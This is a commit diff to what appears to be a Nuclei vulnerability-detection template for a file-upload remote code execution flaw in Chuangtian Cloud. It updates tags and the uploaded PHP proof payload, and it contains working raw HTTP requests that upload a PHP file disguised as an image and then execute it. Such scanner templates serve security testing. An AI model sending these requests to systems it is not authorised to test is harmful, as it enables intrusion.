Update core-chuangtian-cloud-rce.yaml
parent
69596d5341
commit
f62d4f09aa
|
@ -11,7 +11,7 @@ info:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||||
cvss-score: 10.0
|
cvss-score: 10.0
|
||||||
cwe-id: CWE-77
|
cwe-id: CWE-77
|
||||||
tags: rce,fileupload,intrusive
|
tags: rce,fileupload,intrusive,cloud,chuangtian
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -24,21 +24,21 @@ requests:
|
||||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
|
||||||
|
|
||||||
------WebKitFormBoundaryfcKRltGv
|
------WebKitFormBoundaryfcKRltGv
|
||||||
Content-Disposition: form-data; name="file"; filename="test.php"
|
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
|
||||||
Content-Type: image/avif
|
Content-Type: image/avif
|
||||||
|
|
||||||
<?php phpinfo(); ?>
|
<?php echo md5("core-chuangtian-cloud"); ?>
|
||||||
------WebKitFormBoundaryfcKRltGv--
|
------WebKitFormBoundaryfcKRltGv--
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /Upload/test/test.php HTTP/1.1
|
GET /Upload/test/{{randstr}}.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
req-condition: true
|
req-condition: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'contains(body_2, "PHP Version")'
|
- 'contains(body_2, "f0a712e2bcf99c5b0c370b3a4286bb35")'
|
||||||
- 'status_code_2 == 200'
|
- 'status_code_2 == 200'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue